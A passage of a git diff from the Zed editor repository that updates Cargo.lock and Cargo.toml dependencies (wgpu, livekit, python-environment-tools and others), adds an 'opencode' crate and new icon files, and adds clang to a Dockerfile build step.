@@ -12340,7 +12455,7 @@ dependencies = [ [[package]] name = "pet-python-utils" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12357,7 +12472,7 @@ dependencies = [ [[package]] name = "pet-reporter" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12371,7 +12486,7 @@ dependencies = [ [[package]] name = "pet-telemetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12386,7 +12501,7 @@ dependencies = [ [[package]] name = "pet-uv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "pet-core", @@ -12398,7 +12513,7 @@ dependencies = [ [[package]] name = "pet-venv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12410,7 +12525,7 @@ dependencies = [ [[package]] name = "pet-virtualenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12422,7 +12537,7 @@ dependencies = [ [[package]] name = "pet-virtualenvwrapper" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12435,7 +12550,7 @@ dependencies = [ [[package]] name = "pet-windows-registry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12453,7 +12568,7 @@ dependencies = [ [[package]] name = "pet-windows-store" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12466,6 +12581,20 @@ dependencies = [ "winreg 0.55.0", ] +[[package]] +name = "pet-winpython" +version = "0.1.0" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" +dependencies = [ + "lazy_static", + "log", + "pet-core", + "pet-fs", + "pet-python-utils", + "pet-virtualenv", + "regex", +] + [[package]] name = "petgraph" version = "0.6.5" @@ -13078,10 +13207,11 @@ dependencies = [ "clock", "collections", "context_server", + "credentials_provider", "dap", "encoding_rs", "extension", - "fancy-regex", + "fancy-regex 0.17.0", "fs", "futures 0.3.31", "fuzzy", @@ -13174,6 +13304,7 @@ dependencies = [ "criterion", "db", "editor", + "feature_flags", "file_icons", "git", "git_ui", @@ -13185,6 +13316,7 @@ dependencies = [ "pretty_assertions", "project", "rayon", + "remote_connection", "schemars", "search", "serde", @@ -13271,8 +13403,8 @@ name = "proptest" version = "1.10.0" source = "git+https://github.com/proptest-rs/proptest?rev=3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b#3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b" dependencies = [ - "bit-set", - "bit-vec", + "bit-set 0.8.0", + "bit-vec 0.8.0", "bitflags 2.10.0", "num-traits", "proptest-macro", @@ -13901,6 +14033,18 @@ version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "20675572f6f24e9e76ef639bc5552774ed45f1c30e2951e1e99c59888861c539" +[[package]] +name = "raw-window-metal" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "40d213455a5f1dc59214213c7330e074ddf8114c9a42411eb890c767357ce135" +dependencies = [ + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-quartz-core", +] + [[package]] name = "rayon" version = "1.11.0" @@ -14563,10 +14707,10 @@ dependencies = [ name = "rope" version = "0.1.0" dependencies = [ - "arrayvec", "criterion", "ctor", "gpui", + "heapless", "log", "rand 0.9.2", "rayon", @@ -15303,6 +15447,7 @@ dependencies = [ "language", "lsp", "menu", + "multi_buffer", "pretty_assertions", "project", "serde", @@ -15675,6 +15820,7 @@ dependencies = [ "edit_prediction", "edit_prediction_ui", "editor", + "feature_flags", "fs", "futures 0.3.31", "fuzzy", @@ -15814,24 +15960,30 @@ name = "sidebar" version = "0.1.0" dependencies = [ "acp_thread", + "action_log", "agent", "agent-client-protocol", "agent_ui", + "anyhow", "assistant_text_thread", "chrono", "editor", "feature_flags", "fs", + "git", "gpui", "language_model", "menu", + "pretty_assertions", "project", + "prompt_store", "recent_projects", "serde_json", "settings", "theme", "ui", "util", + "vim_mode_setting", "workspace", "zed_actions", ] @@ -16126,9 +16278,9 @@ dependencies = [ [[package]] name = "spirv" -version = "0.3.0+sdk-1.3.268.0" +version = "0.4.0+sdk-1.4.341.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eda41003dc44290527a59b13432d4a0379379fa074b70174882adfbdfd917844" +checksum = "d9571ea910ebd84c86af4b3ed27f9dbdc6ad06f17c5f96146b2b671e2976744f" dependencies = [ "bitflags 2.10.0", ] @@ -16573,7 +16725,16 @@ version = "0.27.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "af23d6f6c1a224baef9d3f61e287d2761385a5b88fdab4eb4c6f11aeb54c4bcf" dependencies = [ - "strum_macros", + "strum_macros 0.27.2", +] + +[[package]] +name = "strum" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9628de9b8791db39ceda2b119bbe13134770b56c138ec1d3af810d045c04f9bd" +dependencies = [ + "strum_macros 0.28.0", ] [[package]] @@ -16588,6 +16749,18 @@ dependencies = [ "syn 2.0.117", ] +[[package]] +name = "strum_macros" +version = "0.28.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ab85eea0270ee17587ed4156089e10b9e6880ee688791d45a905f5b1ca36f664" +dependencies = [ + "heck 0.5.0", + "proc-macro2", + "quote", + "syn 2.0.117", +] + [[package]] name = "subtle" version = "2.6.1" @@ -16598,8 +16771,8 @@ checksum = "13c2bddecc57b384dee18652358fb23172facb8a2c51ccc10d74c157bdea3292" name = "sum_tree" version = "0.1.0" dependencies = [ - "arrayvec", "ctor", + "heapless", "log", "proptest", "rand 0.9.2", @@ -17517,7 +17690,7 @@ dependencies = [ "anyhow", "base64 0.22.1", "bstr", - "fancy-regex", + "fancy-regex 0.16.2", "lazy_static", "regex", "rustc-hash 1.1.0", @@ -17604,15 +17777,14 @@ dependencies = [ [[package]] name = "tiny_http" -version = "0.8.2" +version = "0.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9ce51b50006056f590c9b7c3808c3bd70f0d1101666629713866c227d6e58d39" +checksum = "389915df6413a2e74fb181895f933386023c71110878cd0825588928e64cdc82" dependencies = [ "ascii", - "chrono", "chunked_transfer", + "httpdate", "log", - "url", ] [[package]] @@ -17662,15 +17834,17 @@ dependencies = [ "client", "cloud_api_types", "db", - "feature_flags", "git_ui", "gpui", + "icons", + "livekit_client", "notifications", "platform_title_bar", "project", "recent_projects", "release_channel", "remote", + "remote_connection", "rpc", "schemars", "semver", @@ -18376,9 +18550,9 @@ dependencies = [ [[package]] name = "tree-sitter-rust" -version = "0.24.0" +version = "0.24.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b9b18034c684a2420722be8b2a91c9c44f2546b631c039edf575ccba8c61be1" +checksum = "f715f73a0687261ddb686f0d64a1e5af57bd199c4d12be5fdda6676ce1885bf9" dependencies = [ "cc", "tree-sitter-language", @@ -19031,6 +19205,7 @@ dependencies = [ name = "vim_mode_setting" version = "0.1.0" dependencies = [ + "gpui", "settings", ] @@ -19922,7 +20097,7 @@ dependencies = [ [[package]] name = "webrtc-sys" version = "0.3.23" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "cc", "cxx", @@ -19936,7 +20111,7 @@ dependencies = [ [[package]] name = "webrtc-sys-build" version = "0.3.13" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "anyhow", "fs2", @@ -19955,8 +20130,8 @@ checksum = "a751b3277700db47d3e574514de2eced5e54dc8a5436a3bf7a0b248b2cee16f3" [[package]] name = "wgpu" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", "bitflags 2.10.0", @@ -19967,7 +20142,7 @@ dependencies = [ "hashbrown 0.16.1", "js-sys", "log", - "naga 28.0.1", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "parking_lot", "portable-atomic", "profiling", @@ -19984,12 +20159,12 @@ dependencies = [ [[package]] name = "wgpu-core" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", - "bit-vec", + "bit-set 0.9.1", + "bit-vec 0.9.1", "bitflags 2.10.0", "bytemuck", "cfg_aliases 0.2.1", @@ -19997,7 +20172,7 @@ dependencies = [ "hashbrown 0.16.1", "indexmap", "log", - "naga 28.0.1", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "once_cell", "parking_lot", "portable-atomic", @@ -20010,48 +20185,48 @@ dependencies = [ "wgpu-core-deps-emscripten", "wgpu-core-deps-windows-linux-android", "wgpu-hal", + "wgpu-naga-bridge", "wgpu-types", ] [[package]] name = "wgpu-core-deps-apple" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-emscripten" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-windows-linux-android" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-hal" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "android_system_properties", "arrayvec", "ash", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", - "block", + "block2", "bytemuck", "cfg-if", "cfg_aliases 0.2.1", - "core-graphics-types 0.2.0", "glow", "glutin_wgl_sys", "gpu-allocator", @@ -20062,10 +20237,13 @@ dependencies = [ "libc", "libloading", "log", - "metal", - "naga 28.0.1", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "ndk-sys", - "objc", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", + "objc2-quartz-core", "once_cell", "ordered-float 4.6.0", "parking_lot", @@ -20074,25 +20252,38 @@ dependencies = [ "profiling", "range-alloc", "raw-window-handle", + "raw-window-metal", "renderdoc-sys", "smallvec", "thiserror 2.0.17", "wasm-bindgen", + "wayland-sys", "web-sys", + "wgpu-naga-bridge", "wgpu-types", "windows 0.62.2", "windows-core 0.62.2", ] +[[package]] +name = "wgpu-naga-bridge" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" +dependencies = [ + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "wgpu-types", +] + [[package]] name = "wgpu-types" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "bitflags 2.10.0", "bytemuck", "js-sys", "log", + "raw-window-handle", "web-sys", ] @@ -21349,6 +21540,7 @@ dependencies = [ "ui", "util", "uuid", + "vim_mode_setting", "windows 0.61.3", "zed_actions", "zlog", @@ -21765,7 +21957,7 @@ dependencies = [ [[package]] name = "zed" -version = "0.228.0" +version = "0.230.0" dependencies = [ "acp_thread", "acp_tools", @@ -22092,14 +22284,14 @@ dependencies = [ [[package]] name = "zed_glsl" -version = "0.2.0" +version = "0.2.2" dependencies = [ "zed_extension_api 0.1.0", ] [[package]] name = "zed_html" -version = "0.3.0" +version = "0.3.1" dependencies = [ "zed_extension_api 0.7.0", ] diff --git a/Cargo.toml b/Cargo.toml index b6760fa917da7e051fd60a1375be49d516fcf113..f14be5eb54f459054c1d411a08d0318189dfdf42 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -134,6 +134,7 @@ members = [ "crates/notifications", "crates/ollama", "crates/onboarding", + "crates/opencode", "crates/open_ai", "crates/open_path_prompt", "crates/open_router", @@ -381,6 +382,7 @@ node_runtime = { path = "crates/node_runtime" } notifications = { path = "crates/notifications" } ollama = { path = "crates/ollama" } onboarding = { path = "crates/onboarding" } +opencode = { path = "crates/opencode" } open_ai = { path = "crates/open_ai" } open_path_prompt = { path = "crates/open_path_prompt" } open_router = { path = "crates/open_router", features = ["schemars"] } @@ -475,12 +477,11 @@ ztracing_macro = { path = "crates/ztracing_macro" } # External crates # -agent-client-protocol = { version = "=0.9.4", features = ["unstable"] } +agent-client-protocol = { version = "=0.10.2", features = ["unstable"] } aho-corasick = "1.1" alacritty_terminal = { git = "https://github.com/zed-industries/alacritty", rev = "9d9640d4" } any_vec = "0.14" anyhow = "1.0.86" -arrayvec = { version = "0.7.4", features = ["serde"] } ashpd = { version = "0.13", default-features = false, features = [ "async-io", "notification", @@ -513,7 +514,6 @@ aws-smithy-runtime-api = { version = "1.9.2", features = ["http-1x", "client"] } aws-smithy-types = { version = "1.3.4", features = ["http-body-1-x"] } backtrace = "0.3" base64 = "0.22" -bincode = "1.2.1" bitflags = "2.6.0" brotli = "8.0.2" bytes = "1.0" @@ -551,19 +551,21 @@ derive_more = { version = "2.1.1", features = [ dirs = "4.0" documented = "0.9.1" dotenvy = "0.15.0" +dunce = "1.0" ec4rs = "1.1" emojis = "0.6.1" env_logger = "0.11" encoding_rs = "0.8" exec = "0.3.1" -fancy-regex = "0.16.0" +fancy-regex = "0.17.0" fork = "0.4.0" futures = "0.3" futures-concurrency = "7.7.1" futures-lite = "1.13" -gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "c9eac0ed361583e1072860d96776fa52775b82ac" } +gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "37f3c0575d379c218a9c455ee67585184e40d43f" } git2 = { version = "0.20.1", default-features = false, features = ["vendored-libgit2"] } globset = "0.4" +heapless = "0.9.2" handlebars = "4.3" heck = "0.5" heed = { version = "0.21.0", features = ["read-txn-no-tls"] } @@ -572,7 +574,6 @@ human_bytes = "0.4.1" html5ever = "0.27.0" http = "1.1" http-body = "1.0" -hyper = "0.14" ignore = "0.4.22" image = "0.25.1" imara-diff = "0.1.8" @@ -597,13 +598,13 @@ markup5ever_rcdom = "0.3.0" metal = "0.33" minidumper = "0.9" moka = { version = "0.12.10", features = ["sync"] } -naga = { version = "28.0", features = ["wgsl-in"] } +naga = { version = "29.0", features = ["wgsl-in"] } nanoid = "0.4" nbformat = "1.2.0" nix = "0.29" num-format = "0.4.4" objc = "0.2" -objc2-foundation = { version = "=0.3.1", default-features = false, features = [ +objc2-foundation = { version = "=0.3.2", default-features = false, features = [ "NSArray", "NSAttributedString", "NSBundle", @@ -637,13 +638,13 @@ parse_int = "0.9" pciid-parser = "0.8.0" pathdiff = "0.2" percent-encoding = "2.3.2" -pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } +pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } portable-pty = "0.9.0" postage = { version = "0.5", features = ["futures-traits"] } pretty_assertions = { version = "1.3.0", features = ["unstable"] } @@ -690,7 +691,6 @@ serde_json_lenient = { version = "0.2", features = [ "raw_value", ] } serde_path_to_error = "0.1.17" -serde_repr = "0.1" serde_urlencoded = "0.7" sha2 = "0.10" shellexpand = "2.1.0" @@ -719,9 +719,8 @@ time = { version = "0.3", features = [ "formatting", "local-offset", ] } -tiny_http = "0.8" +tiny_http = "0.12" tokio = { version = "1" } -tokio-tungstenite = { version = "0.26", features = ["__rustls-tls"] } tokio-socks = { version = "0.5.2", default-features = false, features = [ "futures-io", "tokio", @@ -753,7 +752,7 @@ tree-sitter-md = { git = "https://github.com/tree-sitter-grammars/tree-sitter-ma tree-sitter-python = "0.25" tree-sitter-regex = "0.24" tree-sitter-ruby = "0.23" -tree-sitter-rust = "0.24" +tree-sitter-rust = "0.24.1" tree-sitter-typescript = { git = "https://github.com/zed-industries/tree-sitter-typescript", rev = "e2c53597d6a5d9cf7bbe8dccde576fe1e46c5899" } # https://github.com/tree-sitter/tree-sitter-typescript/pull/347 tree-sitter-yaml = { git = "https://github.com/zed-industries/tree-sitter-yaml", rev = "baff0b51c64ef6a1fb1f8390f3ad6015b83ec13a" } tracing = "0.1.40" @@ -782,7 +781,8 @@ wax = "0.7" which = "6.0.0" wasm-bindgen = "0.2.113" web-time = "1.1.0" -wgpu = { git = "https://github.com/zed-industries/wgpu", rev = "465557eccfe77c840a9b4936f1408da9503372c4" } +webrtc-sys = "0.3.23" +wgpu = { git = "https://github.com/zed-industries/wgpu.git", branch = "v29" } windows-core = "0.61" yawc = "0.2.5" zeroize = "1.8" @@ -850,8 +850,9 @@ notify = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24c notify-types = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24cad542c28e04ced02e20325a4ec28a31d" } windows-capture = { git = "https://github.com/zed-industries/windows-capture.git", rev = "f0d6c1b6691db75461b732f6d5ff56eed002eeb9" } calloop = { git = "https://github.com/zed-industries/calloop" } -livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" } -libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" } +livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" } +libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" } +webrtc-sys = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" } [profile.dev] split-debuginfo = "unpacked" diff --git a/Dockerfile-collab b/Dockerfile-collab index 63359334906b58c560c0ed6acc6378259ccbd5c5..50af874200a6ef3bc3c882b7d08257ec41f944de 100644 --- a/Dockerfile-collab +++ b/Dockerfile-collab @@ -14,8 +14,12 @@ ARG GITHUB_SHA ENV GITHUB_SHA=$GITHUB_SHA # Also add `cmake`, since we need it to build `wasmtime`. +# clang is needed because `webrtc-sys` uses Clang-specific compiler flags. RUN apt-get update; \ - apt-get install -y --no-install-recommends cmake + apt-get install -y --no-install-recommends cmake clang + +ENV CC=clang +ENV CXX=clang++ RUN --mount=type=cache,target=./script/node_modules \ --mount=type=cache,target=/usr/local/cargo/registry \ diff --git a/REVIEWERS.conl b/REVIEWERS.conl index 82086b7f42cbb123487030cf7d2e64fc1288cbd2..85cdb3ee89c10b1bfb567a0007a603cc01f922c7 100644 --- a/REVIEWERS.conl +++ b/REVIEWERS.conl @@ -122,6 +122,5 @@ vim = @probably-neb windows - = @localcc = @reflectronic = @Veykril diff --git a/assets/icons/ai_open_code.svg b/assets/icons/ai_open_code.svg new file mode 100644 index 0000000000000000000000000000000000000000..304b155188c2286a4f8cab208872d0373d8099f1 --- /dev/null +++ b/assets/icons/ai_open_code.svg @@ -0,0 +1,3 @@ + + + diff --git a/assets/icons/archive.svg b/assets/icons/archive.svg new file mode 100644 index 0000000000000000000000000000000000000000..9ffe3f39d27c7fe5cbb532a4f263c8800398e96f --- /dev/null +++ b/assets/icons/archive.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/eye_off.svg b/assets/icons/eye_off.svg new file mode 100644 index 0000000000000000000000000000000000000000..3057c3050c36c72be314f9b0646d44932c52e4ee --- /dev/null +++ b/assets/icons/eye_off.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/focus.svg b/assets/icons/focus.svg new file mode 100644 index 0000000000000000000000000000000000000000..9003e437cee1afa43e87fa273c9510284bb5ae0b --- /dev/null +++ b/assets/icons/focus.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/folder_plus.svg b/assets/icons/folder_plus.svg new file mode 100644 index 0000000000000000000000000000000000000000..a543448ed6197043291369bee640e23b6ad729b9 --- /dev/null +++ b/assets/icons/folder_plus.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/git_merge_conflict.svg b/assets/icons/git_merge_conflict.svg new file mode 100644 index 0000000000000000000000000000000000000000..10bc2c04fc9877112723273b0d60351c3a4c56bc --- /dev/null +++ b/assets/icons/git_merge_conflict.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/git_worktree.svg b/assets/icons/git_worktree.svg new file mode 100644 index 0000000000000000000000000000000000000000..25b49bc69f34d8a742451709d4d4a164f29248b6 --- /dev/null +++ b/assets/icons/git_worktree.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/signal_high.svg b/assets/icons/signal_high.svg new file mode 100644 index 0000000000000000000000000000000000000000..6c1fec96098242444407fb9f66a025d03a10e50b --- /dev/null +++ b/assets/icons/signal_high.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_low.svg b/assets/icons/signal_low.svg new file mode 100644 index 0000000000000000000000000000000000000000..b0ebccdd4c8897e8fdaf013a56cc4498dc5e0fe7 --- /dev/null +++ b/assets/icons/signal_low.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_medium.svg b/assets/icons/signal_medium.svg new file mode 100644 index 0000000000000000000000000000000000000000..3652724dc8b095dd68eb9977108711e71ffe67cb --- /dev/null +++ b/assets/icons/signal_medium.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/stop.svg b/assets/icons/stop.svg index cc2bbe9207acf5acd44ff13e93140099d222250b..5ca9cd29edf17981500482b81e47aa53a16e2713 100644 --- a/assets/icons/stop.svg +++ b/assets/icons/stop.svg @@ -1,3 +1,3 @@ - + diff --git a/assets/icons/thread.svg b/assets/icons/thread.svg index 496cf42e3a3ee1439f36b8e2479d05564362e628..569a6f3aec7e3b8742d3d7d23fe11db5aea199ba 100644 --- a/assets/icons/thread.svg +++ b/assets/icons/thread.svg @@ -1,3 +1,4 @@ - + + diff --git a/assets/icons/threads_sidebar_left_closed.svg b/assets/icons/threads_sidebar_left_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..feb1015254635ef65f90f2c9ea38efab74d01d60 --- /dev/null +++ b/assets/icons/threads_sidebar_left_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_left_open.svg b/assets/icons/threads_sidebar_left_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..8057b060a84d7d7ffcf29aff1c0c79a8764edc22 --- /dev/null +++ b/assets/icons/threads_sidebar_left_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_closed.svg b/assets/icons/threads_sidebar_right_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..10fa4b792fd65b5875dcf2cadab1fc12a123ab47 --- /dev/null +++ b/assets/icons/threads_sidebar_right_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_open.svg b/assets/icons/threads_sidebar_right_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..23a01eb3f82a5866157220172c868ed9ded46033 --- /dev/null +++ b/assets/icons/threads_sidebar_right_open.svg @@ -0,0 +1,5 @@ + + + + + diff 